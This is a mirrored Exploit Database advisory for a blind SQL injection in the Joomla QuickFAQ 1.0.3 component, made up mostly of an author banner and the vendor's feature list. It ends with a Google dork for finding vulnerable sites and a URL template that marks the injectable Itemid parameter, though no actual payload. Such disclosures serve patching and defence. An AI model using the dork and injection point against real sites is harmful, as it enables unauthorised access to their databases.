Joomla! Component QuickFAQ 1.0.3 – Blind SQL Injection

• Exploit Database
• 38 阅读

• 作者： RoAd_KiLlEr
  日期： 2010-07-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14296/

• -----------------------------------------------------------------------------------------
   Joomla Component(com_quickfaq)BSQL-i Vulnerability
  -----------------------------------------------------------------------------------------
  [+]TitleJoomla Component(com_quickfaq)BSQL-i Vulnerability
  [+]Author**RoAd_KiLlEr**
  [+]ContactRoAd_KiLlEr[at]Khg-Crew[dot]Ws
  [+]Tested on Win Xp Sp 2/3
  ---------------------------------------------------------------------------
  [~] Founded by **RoAd_KiLlEr**
  [~] Team: Albanian Hacking Crew
  [~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws 
  [~] Home: http://inj3ct0r.com
  [~] Vendor: http://www.schlu.net
  [~] Download Application:http://www.schlu.net/downloads/16-component/77-quickfaq.html
  [~] Version: 1.0.3
  ==========ExPl0iT3d by **RoAd_KiLlEr**==========
  
  [+]Description:
  QuickFAQ is an easy to use but powerful FAQ management system.
  
  Feature List:
  * Unlimited Subcategories
  * Assign FAQ Items to multiple Categories
  * Create Tags/Labels to flag FAQ Items
  * Up/down voting of FAQ Items
  * Favoure FAQ Items to maintain a personal bookmark list
  * Document uploader/manager
  * PDF creation of FAQ Items
  * RTL support
  * RSS/ATOM Feeds
  * Detailed statistics
  * JComments and JomComments integration
  =========================================
  
  [+] Dork: inurl:"com_quickfaq"
  
  ==========================================
  
  
  [+].SQL-i Vulnerability
  =+=+=+=+=+=+=+=+=+
  
  [Exploit]:http://127.0.0.1/path/index.php?option=com_quickfaq&view=category&cid=[Valid Cid]&Itemid= [BSQL-Injection]